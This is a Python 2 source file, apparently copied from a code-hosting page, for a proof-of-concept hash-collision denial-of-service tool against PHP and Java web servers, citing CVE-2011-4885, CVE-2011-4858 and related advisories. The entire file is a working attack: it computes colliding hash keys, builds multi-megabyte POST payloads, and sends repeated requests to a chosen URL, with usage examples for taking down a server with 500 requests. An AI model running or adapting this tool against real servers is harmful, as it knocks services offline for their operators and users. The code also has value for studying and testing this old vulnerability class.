359 lines
No EOL
13 KiB
Python
Executable file
359 lines
No EOL
13 KiB
Python
Executable file
#!/usr/bin/env python
|
|
|
|
"""
|
|
This script was written by Christian Mehlmauer <FireFart@gmail.com>
|
|
https://twitter.com/#!/_FireFart_
|
|
|
|
Sourcecode online at:
|
|
https://github.com/FireFart/HashCollision-DOS-POC
|
|
|
|
Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
|
|
|
|
http://www.ocert.org/advisories/ocert-2011-003.html
|
|
CVE:
|
|
Apache Geronimo: CVE-2011-5034
|
|
Oracle Glassfish: CVE-2011-5035
|
|
PHP: CVE-2011-4885
|
|
Apache Tomcat: CVE-2011-4858
|
|
|
|
requires Python 2.7
|
|
|
|
Examples:
|
|
-) Make a single Request, wait for the response and save the response to output0.html
|
|
python HashtablePOC.py -u https://host/index.php -v -c 1 -w -o output -t PHP
|
|
|
|
-) Take down a PHP server(make 500 requests without waiting for a response):
|
|
python HashtablePOC.py -u https://host/index.php -v -c 500 -t PHP
|
|
|
|
-) Take down a JAVA server(make 500 requests without waiting for a response, maximum POST data size 2MB):
|
|
python HashtablePOC.py -u https://host/index.jsp -v -c 500 -t JAVA -m 2
|
|
|
|
Changelog:
|
|
v6.0: Added Javapayloadgenerator
|
|
v5.0: Define max payload size as parameter
|
|
v4.0: Get PHP Collision Chars on the fly
|
|
v3.0: Load Payload from file
|
|
v2.0: Added Support for https, switched to HTTP 1.1
|
|
v1.0: Initial Release
|
|
"""
|
|
|
|
import socket
|
|
import sys
|
|
import math
|
|
import urllib
|
|
import string
|
|
import time
|
|
import urlparse
|
|
import argparse
|
|
import ssl
|
|
import random
|
|
import itertools
|
|
|
|
class Payloadgenerator:
|
|
# Maximum recursions when searching for collisionchars
|
|
_recursivemax = 15
|
|
_recursivecounter = 1
|
|
|
|
def __init__(self, verbose, collisionchars = 5, collisioncharlength = 2, payloadlength = 8):
|
|
self._verbose = verbose
|
|
self._collisionchars = collisionchars
|
|
self._collisioncharlength = collisioncharlength
|
|
self._payloadlength = payloadlength
|
|
|
|
def generateASPPayload(self):
|
|
raise Exception("ASP Payload not implemented")
|
|
|
|
def generateJAVAPayload(self):
|
|
a = self._computeJAVACollisionChars(self._collisionchars)
|
|
return self._generatePayload(a, self._payloadlength)
|
|
|
|
def generatePHPPayload(self):
|
|
# Note: Default max POST Data Length in PHP is 8388608 bytes (8MB)
|
|
# compute entries with collisions in PHP hashtable hash function
|
|
a = self._computePHPCollisionChars(self._collisionchars)
|
|
return self._generatePayload(a, self._payloadlength);
|
|
|
|
def _computePHPCollisionChars(self, count):
|
|
charrange = range(0, 256)
|
|
return self._computeCollisionChars(self._DJBX33A, count, charrange)
|
|
|
|
def _computeJAVACollisionChars(self, count):
|
|
charrange = range(0, 129)
|
|
return self._computeCollisionChars(self._DJBX31A, count, charrange)
|
|
|
|
def _computeCollisionChars(self, function, count, charrange):
|
|
hashes = {}
|
|
counter = 0
|
|
length = self._collisioncharlength
|
|
a = ""
|
|
for i in charrange:
|
|
a = a+chr(i)
|
|
source = list(itertools.product(a, repeat=length))
|
|
basestr = ''.join(random.choice(source))
|
|
basehash = function(basestr)
|
|
hashes[str(counter)] = basestr
|
|
counter = counter + 1
|
|
for item in source:
|
|
tempstr = ''.join(item)
|
|
if tempstr == basestr:
|
|
continue
|
|
if function(tempstr) == basehash:
|
|
hashes[str(counter)] = tempstr
|
|
counter = counter + 1
|
|
if counter >= count:
|
|
break;
|
|
if counter < count:
|
|
# Try it again
|
|
if self._recursivecounter > self._recursivemax:
|
|
print("Not enought values found. Please start this script again")
|
|
sys.exit(1)
|
|
print("%d: Not enough values found. Trying it again..." % self._recursivecounter)
|
|
self._recursivecounter = self._recursivecounter + 1
|
|
hashes = self._computeCollisionChars(function, count, charrange)
|
|
else:
|
|
if self._verbose:
|
|
print("Found values:")
|
|
for item in hashes:
|
|
tempstr = hashes[item]
|
|
print("\tValue: %s\tHash: %s" % (tempstr, function(tempstr)))
|
|
for i in tempstr:
|
|
print("\t\tValue: %s\tCharcode: %d" % (i, ord(i)))
|
|
return hashes
|
|
|
|
def _DJBXA(self, inputstring, base, start):
|
|
counter = len(inputstring) - 1
|
|
result = start
|
|
for item in inputstring:
|
|
result = result + (math.pow(base, counter) * ord(item))
|
|
counter = counter - 1
|
|
return int(round(result))
|
|
|
|
#PHP
|
|
def _DJBX33A(self, inputstring):
|
|
return self._DJBXA(inputstring, 33, 5381)
|
|
|
|
#Java
|
|
def _DJBX31A(self, inputstring):
|
|
return self._DJBXA(inputstring, 31, 0)
|
|
|
|
#ASP
|
|
def _DJBX33X(self, inputstring):
|
|
counter = len(inputstring) - 1
|
|
result = 5381
|
|
for item in inputstring:
|
|
result = result + (int(round(math.pow(33, counter))) ^ ord(item))
|
|
counter = counter - 1
|
|
return int(round(result))
|
|
|
|
def _generatePayload(self, collisionchars, payloadlength):
|
|
# Taken from:
|
|
# https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
|
|
|
|
# how long should the payload be
|
|
length = payloadlength
|
|
size = len(collisionchars)
|
|
post = ""
|
|
maxvaluefloat = math.pow(size,length)
|
|
maxvalueint = int(math.floor(maxvaluefloat))
|
|
for i in range (maxvalueint):
|
|
inputstring = self._base_convert(i, size)
|
|
result = inputstring.rjust(length, "0")
|
|
for item in collisionchars:
|
|
result = result.replace(str(item), collisionchars[item])
|
|
post += urllib.urlencode({result:""}) + "&"
|
|
|
|
return post;
|
|
|
|
def _base_convert(self, num, base):
|
|
fullalphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
|
alphabet = fullalphabet[:base]
|
|
if (num == 0):
|
|
return alphabet[0]
|
|
arr = []
|
|
base = len(alphabet)
|
|
while num:
|
|
rem = num % base
|
|
num = num // base
|
|
arr.append(alphabet[rem])
|
|
arr.reverse()
|
|
return "".join(arr)
|
|
|
|
def main():
|
|
parser = argparse.ArgumentParser(description="Take down a remote Host via Hashcollisions", prog="Universal Hashcollision Exploit")
|
|
parser.add_argument("-u", "--url", dest="url", help="Url to attack", required=True)
|
|
parser.add_argument("-w", "--wait", dest="wait", action="store_true", default=False, help="wait for Response")
|
|
parser.add_argument("-c", "--count", dest="count", type=int, default=1, help="How many requests")
|
|
parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output")
|
|
parser.add_argument("-s", "--save", dest="save", help="Save payload to file")
|
|
parser.add_argument("-p", "--payload", dest="payload", help="Save payload to file")
|
|
parser.add_argument("-o", "--output", dest="output", help="Save Server response to file. This name is only a pattern. HTML Extension will be appended. Implies -w")
|
|
parser.add_argument("-t", "--target", dest="target", help="Target of the attack", choices=["ASP", "PHP", "JAVA"], required=True)
|
|
parser.add_argument("-m", "--max-payload-size", dest="maxpayloadsize", help="Maximum size of the Payload in Megabyte. PHPs defaultconfiguration does not allow more than 8MB, Tomcat is 2MB", type=int)
|
|
parser.add_argument("-g", "--generate", dest="generate", help="Only generate Payload and exit", default=False, action="store_true")
|
|
parser.add_argument("--version", action="version", version="%(prog)s 6.0")
|
|
|
|
options = parser.parse_args()
|
|
|
|
if options.target == "PHP":
|
|
if not options.maxpayloadsize or options.maxpayloadsize == 0:
|
|
maxpayloadsize = 8
|
|
else:
|
|
maxpayloadsize = options.maxpayloadsize
|
|
elif options.target == "ASP":
|
|
if not options.maxpayloadsize or options.maxpayloadsize == 0:
|
|
maxpayloadsize = 8
|
|
else:
|
|
maxpayloadsize = options.maxpayloadsize
|
|
elif options.target == "JAVA":
|
|
if not options.maxpayloadsize or options.maxpayloadsize == 0:
|
|
maxpayloadsize = 2
|
|
else:
|
|
maxpayloadsize = options.maxpayloadsize
|
|
else:
|
|
print("Target %s not yet implemented" % options.target)
|
|
sys.exit(1)
|
|
|
|
url = urlparse.urlparse(options.url)
|
|
|
|
if not url.scheme:
|
|
print("Please provide a scheme to the URL(http://, https://,..")
|
|
sys.exit(1)
|
|
|
|
host = url.hostname
|
|
path = url.path
|
|
port = url.port
|
|
if not port:
|
|
if url.scheme == "https":
|
|
port = 443
|
|
elif url.scheme == "http":
|
|
port = 80
|
|
else:
|
|
print("Unsupported Protocol %s" % url.scheme)
|
|
sys.exit(1)
|
|
if not path:
|
|
path = "/"
|
|
|
|
if not options.payload:
|
|
print("Generating Payload...")
|
|
|
|
# Number of colliding chars to find
|
|
collisionchars = 5
|
|
# Length of the collision chars (2 = Ey, FZ; 3=HyA, ...)
|
|
collisioncharlength = 2
|
|
# Length of each parameter in the payload
|
|
payloadlength = 8
|
|
generator = Payloadgenerator(options.verbose, collisionchars, collisioncharlength, payloadlength)
|
|
if options.target == "PHP":
|
|
payload = generator.generatePHPPayload()
|
|
elif options.target == "ASP":
|
|
#payload = generateASPPayload()
|
|
print("Target %s not yet implemented" % options.target)
|
|
sys.exit(1)
|
|
elif options.target == "JAVA":
|
|
payload = generator.generateJAVAPayload()
|
|
else:
|
|
print("Target %s not yet implemented" % options.target)
|
|
sys.exit(1)
|
|
|
|
print("Payload generated")
|
|
else:
|
|
f = open(options.payload, "r")
|
|
payload = f.read()
|
|
f.close()
|
|
print("Loaded Payload from %s" % options.payload)
|
|
|
|
# trim to maximum payload size (in MB)
|
|
maxinmb = maxpayloadsize*1024*1024
|
|
payload = payload[:maxinmb]
|
|
# remove last invalid(cut off) parameter
|
|
position = payload.rfind("=&")
|
|
payload = payload[:position+1]
|
|
|
|
# Save payload
|
|
if options.save:
|
|
f = open(options.save, "w")
|
|
f.write(payload)
|
|
f.close()
|
|
print("Payload saved to %s" % options.save)
|
|
|
|
# User selected to only generate the payload
|
|
if options.generate:
|
|
return
|
|
|
|
print("Host: %s" % host)
|
|
print("Port: %s" % str(port))
|
|
print("path: %s" % path)
|
|
print
|
|
print
|
|
|
|
for i in range(options.count):
|
|
print("sending Request #%s..." % str(i+1))
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
if url.scheme == "https":
|
|
ssl_sock = ssl.wrap_socket(sock)
|
|
ssl_sock.connect((host, port))
|
|
ssl_sock.settimeout(None)
|
|
else:
|
|
sock.connect((host, port))
|
|
sock.settimeout(None)
|
|
|
|
request = "POST %s HTTP/1.1\r\n\
|
|
Host: %s\r\n\
|
|
Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n\
|
|
Connection: Close\r\n\
|
|
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.20) Gecko/20110803 Firefox/3.6.20 ( .NET CLR 3.5.30729; .NET4.0E)\r\n\
|
|
Content-Length: %s\r\n\
|
|
\r\n\
|
|
%s\r\n\
|
|
\r\n" % (path, host, str(len(payload)), payload)
|
|
|
|
if url.scheme == "https":
|
|
ssl_sock.send(request)
|
|
else:
|
|
sock.send(request)
|
|
|
|
if options.verbose:
|
|
if len(request) > 400:
|
|
print(request[:400]+"....")
|
|
else:
|
|
print(request)
|
|
print("")
|
|
if options.wait or options.output:
|
|
start = time.time()
|
|
if url.scheme == "https":
|
|
data = ssl_sock.recv(1024)
|
|
string = ""
|
|
while len(data):
|
|
string = string + data
|
|
data = ssl_sock.recv(1024)
|
|
else:
|
|
data = sock.recv(1024)
|
|
string = ""
|
|
while len(data):
|
|
string = string + data
|
|
data = sock.recv(1024)
|
|
|
|
elapsed = (time.time() - start)
|
|
print("Request %s finished" % str(i+1))
|
|
print("Request %s duration: %s" % (str(i+1), elapsed))
|
|
split = string.partition("\r\n\r\n")
|
|
header = split[0]
|
|
content = split[2]
|
|
if options.verbose:
|
|
# only print http header
|
|
print("")
|
|
print(header)
|
|
print("")
|
|
if options.output:
|
|
f = open(options.output+str(i)+".html", "w")
|
|
f.write("<!-- "+header+" -->\r\n"+content)
|
|
f.close()
|
|
|
|
if url.scheme == "https":
|
|
ssl_sock.close()
|
|
sock.close()
|
|
else:
|
|
sock.close()
|
|
|
|
if __name__ == "__main__":
|
|
main() |